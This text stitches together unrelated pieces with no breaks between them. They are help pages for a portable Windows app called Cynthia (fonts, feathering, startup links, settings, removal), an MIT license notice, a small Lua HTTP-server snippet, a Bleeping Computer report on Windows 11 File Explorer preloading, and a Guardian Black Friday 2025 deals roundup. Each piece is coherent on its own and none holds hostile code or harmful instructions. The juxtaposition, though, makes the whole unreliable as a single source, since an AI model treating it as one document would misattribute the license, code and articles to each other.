A font determines what sort of characters appear on the screen, and in what style. Click "Options > Font" and choose a font name (font) from the list of options, from Arial to DejaVu Serif. Any change updates the app in realtime.
Older fonts like "System" were simple formats constructed from small images or bitmaps, one per character, and did not scale up very well, partly because to save on memory, not all character sizes were stored inside the font. Today, modern fonts use mathematical vectoring to draw shapes and lines etc to construct characters on the screen, though the infrastructure and overhead required for such fonts can be complex and heavy on a computer system. But because these fonts employ mathematics to draw their characters, they do scale up well.
Eleven common font name options are presented for best compatibility and visual appearance, taking into consideration operating systems as old as Windows 95 through to modern-day Windows 11, and other systems such as Mac and Linux.
In general, you want a font that is widely supported and guaranteed to render well on most computers. Bearing that in mind, Arial is a good choice, as it is widely supported by operating systems going as far back as Windows 95, if not further.
If a font name is selected but is not supported by the current computer, for example "DejaVu Sans" - not supported by Windows 95 - a close approximate/fallback font is used instead.
For a specific/custom font, click the "Custom" option once to switch it on, and click it again to display a Font dialog. Choose the font name from the list of fonts and click the "OK" button when done.
If the app becomes unreadable, or hard to read after choosing a new font name - it can happen with a bad font, a foreign language font, or a symbols only font like "Wingdings" - press the "F2" key to restore the app's default settings.
Change app font feathering/antialiasing
For maximum font compatibility, two completely separate methods have been employed to render text with antialiasing.
Click "Options > Font" for font settings.
1. The first method, Font Feathering, is a simple feather designed specifically to outline each text character in realtime. This has the effect of gently softening the often harsh outline of text characters on LCD screens, which by their nature do not blur neighbouring pixels as the older CRTs (cathode ray tubes) did.
The feather is universally applied to both bitmap fonts (older image based fonts) and vector fonts (newer mathematical fonts). In this way it allows for a quick and direct text feathering technique that is easily adjusted to suit, without the need for complicated or tricky multi-step setup configurations and/or processes.
As a bonus, it works on older operating systems - e.g. Windows 95 - which back in the day had no need/support for it, as LCD monitors were not widely used. It also works on fonts that don't have any embedded feather information, or for smaller font sizes that at times can abruptly discontinue feather support.
This method generates an even, edge-based blurring of the outermost pixels of the text characters. A high value - high or ultra - renders a strong/bold feather, and a low value reduces this to a more subtle display.
Any change updates in realtime.
On a high quality computer monitor, where all pixels are transmitted and displayed without any color loss, a "Low" value is typically sufficient to render text gently on the screen. But TVs, which tend to heavily compress their video streams for speed, lose some color information and therefore may require a higher setting of "Medium" or "High" for similar results.
2. The second method, Font Specific Antialiasing, relies on the font itself to provide all feather based information. This is usually an 8 bit greyscale range of 0-255. The downside is, if the font has no feather support, or the operating system is old, e.g. Windows 95, then no antialiasing will appear. This method can sometimes be hit and miss.
For instance, take the font Arial: it is universally supported, but surprisingly loses feather support at 12 pt or less, leaving only sharp text characters to be rendered on screen.
To adjust the antialiasing strength, select an option from "Dark" (strong) to "Light" (subtle).
By default, options 1 and 2 above are set to "Low/Dark", which provides the best fit for a wide variety of fonts and their behavior over a broad spectrum of old and new operating systems.
App startup style
The app can be set to start up in various ways: normally, minimised, maximised or in fullscreen mode. To adjust, click "Options > Settings" and set an option under "Start Style".
Normal:
Starts the app as a window, which is the default mode.
Minimised:
Starts the app hidden from view as a button on your taskbar.
Maximised:
Starts the app as a window, maximised to fill all the available work area on your desktop.
Fullscreen:
Starts the app in fullscreen mode, blocking out everything else on your desktop.
Note:
If the app has the "Multi-Monitor" option selected (next section down named "Display"), then modes "Maximised" and "Fullscreen" will render the app over the combined screen real estate of all monitors.
Create a link to the app on your Start button and Desktop, and the Automatic Startup option
The app can create, maintain and remove links for you.
There are three link types supported:
1. Start button
2. Desktop
3. Automatic Startup
Click "Options > Settings" to adjust.
1. The first link type, Start button, creates and automatically maintains a link - also known as a shortcut - on your Start Menu called "Cynthia by BlaizEnterprises.com". As this link is created by and maintained by the app, you must unselect the option to remove the link from your Start Menu.
2. The Desktop link operates identically to the above, maintaining a link on your Desktop named "Cynthia by BlaizEnterprises.com". It also must be unselected to remove the link permanently from your Desktop.
Note:
As long as either option 1 or 2 above is selected, the corresponding link is maintained and automatically re-created if need be by the app, even if it is manually deleted from outside the app.
By default, neither option is selected. Optionally, you can create your own manual link/shortcut to the app using Windows with any name/label you wish.
3. The last option, Automatic Startup, creates a link to the app in the startup location of your computer, informing Windows to launch the app when your computer boots/starts up. Again, this link is automatically maintained, therefore unselect the option to remove it.
Note:
If any of the links above are selected and you plan to remove/delete the app from your computer, it is highly recommended you first unselect all the options above (1-3), then remove/delete the app. Otherwise, Windows can get a little weird and put the links back in some cases without any interaction from the app itself, even if the app is no longer present. This behaviour was observed with earlier versions of Windows 10.
A few important app settings explained
The majority of the app's important system settings can be found in one location - click "Options > Settings".
An option is considered "on/enabled/selected" when lit, and "off/disabled/unselected" when unlit.
Round Corners:
Render all visual controls, windows, and dialogs with round (curved) corners.
Soft Close:
Automatically close an active dialog window when a click/tap strikes outside the window area - e.g. Save, Open, Font, Options dialogs. This can speed up typical workflows by skipping the need to specifically click the OK or Cancel buttons to close the dialog. For instance, click "Options" to display the options dialog, change a few settings and click/tap outside the window to close it and save changes. Also convenient to cancel a dialog displayed by mistake/change of mind, such as a Save dialog.
Safe Area:
Retains app window on screen at all times, and any sub windows or dialogs within the app. Any attempt to drag the app out-of-range triggers an automatic position correction - a passive system that continuously checks the window position and monitor size. Supports both single and multi-monitor modes.
Show Splash:
Displays an informative/artistic splash screen on app startup. Unselect to disable.
Realtime Help:
Scrolls control-centric help across the top of the current window, dialog, or menu. Hover mouse cursor over / tap finger on a control for related help.
Hints:
Hover mouse over / tap finger on a control to display help related information in a popup bubble
Touch:
Comfortably enlarge controls and menus for touch access (finger taps)
Double Clicks:
Some options work best with a double click / tap for confirmation. This option supports the traditional double click mode. For example, navigating a disk drive using a double click / tap to switch between folders.
On Top:
Set the app above all other apps and windows
Economy:
Normal app operation can use a lot of paint cycles and CPU power, especially if it's rendering graphics and effects continuously on the screen. Economy mode throttles back this usage during periods of extended idleness, e.g. when there is no direct app keyboard input, or indirect mouse cursor movement or finger taps. For more specific information refer to the topic "Economy mode".
32bit Graphics:
Not noticeable on today's powerful computers with their 32 bit monitors and video cards, but it can deliver a small performance improvement on older computers running 24 bit graphics
Frame Maximised:
Show the app's frame whilst maximised. The frame is always hidden whilst in fullscreen mode.
Safe Background:
An optional static or animated background scheme can be set, which renders an image beneath the GUI. If this image is too bold / strong the GUI can be hard to view / use. By default this option limits the background strength to a safe maximum level of 100. Unselect this option to permit the full range of background strength (0-255). If the GUI becomes hard to use or unreadable, press the "F2" key at anytime to restore the app's default settings.
Multi-Monitor:
Permit the app to span the full range of attached monitors when maximised or in fullscreen mode. By default the app spans the current monitor only.
Center Title:
Position the name of the app in the center of the app's window header
Toolbar Alignment:
Align the content of all participating toolbars to the left, center, or to the right
Color Contrast:
Color coordinate important system settings and options into color specific input panels for rapid visual identification
Monochromatic Images:
Use high-contrast, color-adaptive, monochromatic tool images on the app's GUI
Highlight Above:
Retain highlight areas and other important GUI zones whilst a background scheme is in use
Brightness:
Adjust the brightness of the entire app, from 60 being the darkest right up to 130 being the brightest. Any change takes effect immediately. The default brightness is 100.
Unfocused Opacity:
Renders the app translucent upon losing focus - e.g. when another app is in use. The available range is 30 (almost invisible) through to 255 (fully visible). The default value is 255. This feature requires the support of a modern operating system and is therefore not supported by Windows 95/98 etc.
Speed:
The speed by which to transition the app from a focused state to a non-focused state or vice-versa. Speed range is 1-10, where 1 is the slowest and 10 the fastest.
Focused Opacity:
Renders the app translucent upon gaining focus - e.g. when the user interacts with it. The available range is 50 (almost invisible) through to 255 (fully visible). The default value is 255. As above, this feature requires the support of a modern operating system and is therefore not supported by Windows 95/98 etc.
Cursor:
Change the default cursor to one of the built-in cursors, each of which scale from small to large, according to the current size set by the operating system. A range of static colors are available: Red, Orange, Pink, Yellow, Purple, Aqua, Blue, Green, Grey, Black, White, along with Default and Custom.
In addition, two dynamically colored cursors are included: "Adaptive - Hover" and "Adaptive - Title". These special cursors acquire their color from the current color scheme. Any change to the color scheme is reflected in the color of the cursor.
The custom cursor option supports both static cursors ".cur" and animated cursor ".ani" file formats. To use, select the "Custom" option. The cursor will update if previously customised. To change the cursor, click the option again and select a cursor from file using the Open dialog.
Frame Sparkle:
Applies a random texture to the app's frame. Select a value from 0 (off) to 20 (bold).
Frame Size:
Adjust the app's frame size (width in pixels) from 0 (none) to 72 (wide). The default frame size is typically 7.
Scrollbar Size:
Set the width and/or height of the app's scrollbars. A value of 5 (thin/short) to 72 (wide/tall) is supported.
Wine Compatibility:
Wine is basically a large computer instruction conversion app, which allows an app designed for Microsoft Windows to execute ("run") on another operating system, such as a Mac or Linux. Because Wine does not emulate or bridge any logic gaps and only translates an app's instructions, the underlying computer hardware must match that used by Microsoft Windows - namely Intel and AMD64.
A notable exception to this requirement is the modern-day Mac, e.g. Mac Mini, which runs an Intel emulator under the hood. This allows a Microsoft Windows app to run by the following sequence: App to Wine to Intel emulator to Apple hardware. Incredibly, this appears to be a very effective and rather efficient strategy, especially for our lightweight apps.
Although Wine's functionality is both wide and impressive, there is some functionality that falls short of Windows. The Wine Compatibility option compensates where possible for important shortcomings, such as volume handling, and allows the app to maintain functionality.
The default option is automatic and detects the presence of Wine based on the existence of drive "Z:\". For more information on Wine refer to their website www.winehq.org.
Restore Defaults:
Easily reset the app's system settings, such as color, font size, zoom level etc to their defaults. Click the "Restore Defaults..." button at the bottom-right of the Options window or press the "F2" key at any time in the app to display the "Restore Defaults" confirmation prompt. Confirm your intention to reset and then click the "Restore Defaults" button. The app will reset to default values.
An app typically has settings in addition to these which are not restored / reset. Instead, they should be adjusted via the app itself as required.
On Top - Position app above other apps and windows
Click the app menu button (top right) and tick the "On Top" option. Alternatively, click "Options > Settings" and select the "Display > On Top" option.
Don't show the splash screen on app start
By default the splash screen is displayed with a momentary pause on startup. This can be switched off by going to "Options > Settings" and deselecting the "Display > Show Splash" option.
Where is my app? / Show the app folder
Because this app is portable, you might not remember or know where it is located on your hard disk or USB pen stick. To access its folder, click the app menu button (top right) and select "Show App Folder". An explorer window will open with the app's binary (*.exe) and storage folder listed alongside.
Economy mode
Running an app at full speed when it's not being used can be a bit wasteful, and may prematurely drain the batteries on your laptop or tablet. Select this option to automatically throttle back battery / power consumption and CPU / graphics load after a short idle period of 10 minutes, at which point the app will reduce its paint cycles to a maximum of 2 fps, with a further reduction to 1 fps after 30 minutes.
Internal processing loads will typically be reduced also, lowering the demand on your CPU and batteries further.
A single keystroke directed at the app, a global mouse click, or a tap of the finger will instantly disengage the current economy state and return the app to full operation.
To enable, click "Options > Settings" and select "Display > Economy" option.
Some technical limitations of this app
The Gossamer Code Foundation - our 4th generation codebase - which powers this app has been engineered with care and patience to a high level of quality and reliability.
As our code is rather unique and almost entirely custom built, there are some technical limitations which make our apps incompatible with some extended features of modern operating systems.
These limitations mainly concern the use of UTF-8 and UTF-16 encoding of text, and more specifically filenames. At this stage the app works with the legacy Windows-1252 character encoding for both text processing and filenames. The app is therefore unable to handle foreign-language text, or load and save files with special, foreign, or emoji characters in their filenames. All text and filenames are restricted to English ASCII characters in the Windows-1252 encoding standard.
In addition, some options and minor operations may not work as expected, or at all, on operating systems other than Microsoft Windows. Though an enormous amount of time and effort has gone into harmonising the look and feel, behaviour and reliability of the app across multiple flavours of Microsoft Windows, Linux, and Mac operating systems, it is not always possible to catch every failure point, or in some rare cases to make it work properly, though we always endeavour to do our best.
As a side note, our codebase is still running well as 32-bit code in 2025. Yes, 32-bit! Some might see this as a limitation, but we see it as a flexible, inexpensive, and widely adopted execution pathway that supports many platforms and extends the life of older equipment.
What makes a portable app special?
A portable app is a big leap forward for apps in general. A standard or traditionally engineered app requires a lot of support in the form of libraries, data files, images, scripts, and so on. You get the picture. Some portable apps out there still include this bundle of bits; they merely offload it into a local folder. A dump of goodies, of sorts.
We tend to see a portable app in quite a different light. Our vision of a portable app is designed tight, clean, free of bloat, and all data where possible is included directly within, structured right into the fabric of the app itself, and designed from the bare-metal up if required.
The most important difference, though, between a traditional app and a portable app is that a portable app will not install on your computer. This is extremely important, as the installation process is often messy and can clutter up your computer by dumping a lot of stuff all over the Windows file structure and registry, which over time may slow down and decrease the overall performance of your computer.
A portable app will not do this, which keeps your computer clean and running smoothly and fast, as it should. Unfortunately most software is not designed with portability in mind; it's more akin to a large leaky box of bits than tight engineering. And because a portable app is not installed on your computer, it runs outside the normal scope of the operating system and is not locked down or tied to it, and can thus be moved about, from disk to disk, or computer to computer.
Typically a portable app will reside on a USB pen stick, removable media, or in a special folder on a portable hard disk. This makes it easy to take from one computer to the next, and use over and over. An immensely valuable freedom, and something an installed app can only dream of.
But a serious technical hurdle must be overcome for a truly portable app to be free. And that is the humble setting. Yes, a portable app must be able to handle its settings on its own. It must be able to read them from disk, filter them, check and correct them where required, and write them back to disk. All without the help of the Windows registry or other operating-system-dependent structures.
An installed app typically can't or won't do this. Instead, it relies on Windows and the registry to manage its settings and other important data sets for it. It therefore takes a higher degree of technical competence to escape this "tied to the operating system" situation.
Here is our current standard for a portable app:
Require no installation or setup
Require no additional DLL libraries to run and perform its core function
Make no alteration to the host operating system, or its settings, files, libraries or core functions, or the Windows registry, unless it forms a part or a whole of the app's core function, and then, only when initiated by the user
Be able to run "out of the box"
Require no compiling, conversion, installation or setup of support structures in order to execute, except when such a structure constitutes an execution-enabling environment, such as a command translation service like Wine
Be free of zipped or otherwise externally bundled blob structures containing folders, files and bits
Operate on less powerful hardware to facilitate operation on a broad spectrum of computers
Demand less of the API landscape to facilitate execution on a broad range of operating systems and software translation environments
Require no special software libraries be present in order to run, such as .NET or JAVA, unless typically pre-installed on the target operating system or execution environment
Not require an internet connection to run, unless the connection is required to fulfill the app's core function, such as a web server
Require no downloads, addons, or registration in order to run
Provide help and documentation offline via a built-in viewer, or by limited external means, such as Notepad
Be self-contained with all necessary files, data sets, and samples stored within its internal structure, with access preferably provided through direct enabling mechanisms
Store, hold and manage external app settings and user data in a local sub-folder, and that sub-folder be easily identifiable as belonging to the app
Provide a mostly consistent appearance and experience to the user across the widest possible range of operating systems and execution environments
Value backwards compatibility, and be able to actively make use of older hardware and software
Possess a compact, bloat-free footprint
How to remove the app and what you should do first
Make sure any app-related data that is precious to you is backed up before you delete anything.
As a portable app does not install itself on your computer there will be no automatic uninstall option listed in Windows. The app must be removed manually. But this is not difficult.
First, ensure the options below are unselected before proceeding. Click "Options > Settings" and deselect:
1. Start button link
2. Desktop link
3. Automatic Startup link
If these links are not removed they may linger due to the oddities of some versions of Windows and its often complex nature and protocols.
If this app is administered by a 3rd party system then that system should be used now to remove this app. If not, then click the app menu button (top right) and select "Show App Folder". An explorer window will open with the app's executable (*.exe) and storage folder listed.
Make sure any data precious to you has been backed up or moved out of the app's storage folder before proceeding. When you're ready, close the app, right-click on its EXE "<app name>.exe" and select the Delete option. If a prompt appears, confirm your intention to delete. Repeat for the storage folder.
The app is now removed from your computer, USB pen stick, or hard disk.
Help! My app doesn't look right - what should I do?
If for some reason your app doesn't appear right, or you think you've turned some important system setting on or off but you're not sure which one or where, not to worry: you can restore the app's default settings in two easy steps.
Step 1:
From anywhere in the app press the "F2" key to display the "Restore Defaults" confirmation window.
Step 2:
When you're sure you're ready to proceed, click the "Restore Defaults" button. The app will reset, restoring all key system settings to their safe defaults, including color, font size, zoom level etc.
If you don't have a keyboard, or the "F2" key is not available / difficult to access, you can click the "Options" link from the top toolbar to display the options window, then click the "Restore Defaults..." button (bottom right of window), and lastly confirm by pressing the "Restore Defaults" button. The app will reset / restore defaults.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-- Create a new server
local server = require("http").server.new()
-- Register a route
server:get("/", function()
return "hello from default Astra instance!"
end)
-- You can also use the local variables within routes
local counter = 0
server:get("/count", function(request, response)
-- consume the request body
print(request:body():text())
-- set status code (Optional)
response:set_status_code(300)
-- set headers (Optional)
response:set_header("header-key", "header-value")
counter = counter + 1
-- and also can return JSON
return { counter = counter }
end)
-- Configure the server
server.port = 3000
-- Run the server
server:run()
Microsoft tests File Explorer preloading for faster performance
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 13:08:08
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times on Windows 11 systems. [...]...
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times and performance on Windows 11 systems.
According to Microsoft, the app will load automatically once the feature is toggled on without visible changes to users, who should only notice faster File Explorer launches when accessing files and folders.
However, this is an optional feature, and those who prefer to disable preloading can uncheck "Enable window preloading for faster launch times" in File Explorer's Folder Options under the View tab.
"We're exploring preloading File Explorer in the background to help improve File Explorer launch performance," the
Windows Insider Program Team said
.
"Looking forward to your feedback! If you do encounter any issues, please file them in the Feedback Hub under Files Folders and Online Storage > File Explorer Performance, or Files Folders and Online Storage > File Explorer."
These File Explorer speed and performance improvements follow the May 2025 rollout of
Startup Boost
, a similar optional feature for Office applications that launches a Windows scheduled task automatically in the background during system logon to help Office apps load faster.
The feature preloads apps in a paused state, keeping them paused until they are launched or removed from memory to reclaim resources.
Context menu updates
Microsoft is also updating the File Explorer context menu to reduce clutter while maintaining easy access to less frequently used actions by reorganizing menu items into groups of similar tasks.
File Explorer context menu (Microsoft)
For instance, actions such as 'Compress to ZIP file,' 'Copy as Path,' 'Set as Desktop Background,' and image rotation options have been moved to a new "Manage file" flyout menu.
Additionally, cloud provider options such as 'Always Keep on this Device' and 'Free Up Space' now appear within their respective cloud provider flyouts, alongside the Send to My Phone option. The Open Folder Location command has also been repositioned next to 'Open' and 'Open with' for better grouping.
Microsoft also noted that the 'Manage file' label may change in future updates based on user feedback submitted through the Feedback Hub under Desktop Environment > Right-Click Context Menu.
These features are now rolling out to Windows Insiders in the Dev and Beta channels running Windows 11 25H2 who have installed the 26220.7271 (KB5070307) preview build.
The best Black Friday deals on the products we love, from sunrise alarm clocks to dehumidifiers
Guardian
www.theguardian.com
2025-11-24 12:56:27
We’ve cut through the noise to find genuinely good early Black Friday 2025 discounts on Filter-recommended products across home, tech, beauty and toys • Big savings – or big regrets? How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long sin...
Like Christmas Day, Black Friday has long since ceased to be a mere "day". Yuletide now seems to start roughly when Strictly does, and Black Friday kicked off around Halloween, judging by the landfill of exclamation-marked emails weighing down my inbox.
Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on – and it can pay to start dancing now. Some of the Filter’s favourite items are already floating around at prices clearly designed to make them sell out fast. Other deals won’t land until the big day itself on 28 November, or even until the daftly named Cyber Monday (1 December).
As ever, we'd encourage you not to buy anything unless you really need it and have the budget to do so – read our advice on how to shop smartly.
We’ll keep this page updated over the next few days with more genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.
How we selected these deals (and excluded others)
The key to
shopping smart
on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.
Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.
We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as
the Camelizer
to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.
Q&A
How is the Filter covering Black Friday?
At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.
Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.
We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.
The best early Black Friday deals on the Filter’s favourite products
The Filter team recommended this pattern-building game as an “addictive”
Father’s Day gift
“guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.
Race to find the matching images in this popular observation game – one of our top tips for
keeping kids entertained on long train journeys
. You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.
EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star
review
, this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation store, no less.
Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find
sleep aids
that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better
Christmas gift
idea.
Running watch with Spotify
Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)
One of our favourite
fitness tech
gadgets, Garmin’s GPS smartwatch can’t run a
marathon
for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. Amazon outdoes its rivals with this early deal on the aqua green edition of the watch, now at its lowest price ever.
Professional DJ headphones
AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)
Many headphones claim to be pro or DJ-level, but this modular set is a favourite with
actual DJs
. DJ and producer
Sophie Lloyd
told the Filter's Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means "you can buy a new lead or earpieces separately, which is essential when you're using them all the time". This Black Friday deal takes them to their lowest price of 2025.
This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for
university life
and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.
The best home deals
Heated fleece throw
Silentnight luxury heated throw, from £36 (was £45)
One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our
best heated throws
roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.
Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite
baby products
when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.
The best combination steam cleaner
Vax Steam Fresh Total Home mop, from £84 (was £160)
Emerging from Stuart Andrews’
best steam cleaners
test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.
Smart wake-up and reading light
Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)
When testing products for his guide to the
best sunrise alarm clocks
, our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.
A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our
heated airers
test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the
airer with cover
to £195.98 for Black Friday.
The best hybrid mattress
Photograph: Jane Hoskyn/The Guardian
Otty Original Hybrid double, £627.75 with code THEFILTER7 (was £647.99)
The most comfortable and supportive foam-and-springs hybrid of all the
mattresses
we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our
Otty Original Hybrid review
(spoiler: it gets five stars). Otty is now bundling two of our favourite pillows (usually £69.99 each) in with each mattress order, too.
Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent
Simba Hybrid Pro
, another of our
best mattresses
, is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).
Wool mattress topper
Woolroom Deluxe wool topper (double), from £148.74 (was £174.99)
The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe
mattress topper
adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% isn’t quite as big a discount as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.
Powerful pressure washer
Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)
Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the
pressure washers
he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.
A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the
best cordless vacuum cleaners
– and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.
You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the
best robot vacuums
, and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.
Damp-destroying dehumidifier
ProBreeze dehumidifier, from £151.99 (was £189.99)
This “workhorse”, which “extracted moisture powerfully” in our
best dehumidifiers
test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.
Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the
best electric blankets
thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99 – and other retailers still want over £100 for it. We’ll bring you any non-Amazon deals that emerge in the coming days.
Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the
best video doorbell
overall, but lamented that you also have to fork out for a
Nest Aware subscription
at £80 a year to save recordings.
Budget electric blanket
Slumberdown Sleepy Nights electric blanket, king size, from £30.59 (was £45.99)
This Slumberdown Sleepy Nights performed admirably in Emily Peck's test of the best electric blankets, heating quickly to a temperature comfortable enough to keep our reviewer warm through the night. It also has elasticated fitted straps to make fitting easy, and comes in a variety of sizes to suit your bed. It's the king-size one that's been discounted.
Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, then the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the
best video doorbells
out there. He liked the E340 precisely because of its dual camera setup to make keeping an eye on parcels a breeze, plus the onboard storage to stick it to cloud storage. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday from the big online retailer.
Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the
best espresso machines
and
best coffee machines
, where Sasha noted that “you get a lot for your money” even at full price.
The best budget kettle in Rachel’s
best kettles
test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.
This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant
Christmas gift
idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special
Nitrosurge Guinness
too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.
The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his
espresso machines
test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.
Capsule coffee machine
Philips L’or Barista Sublime, from £45 (avg £69.40)
The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the
best coffee machines
.
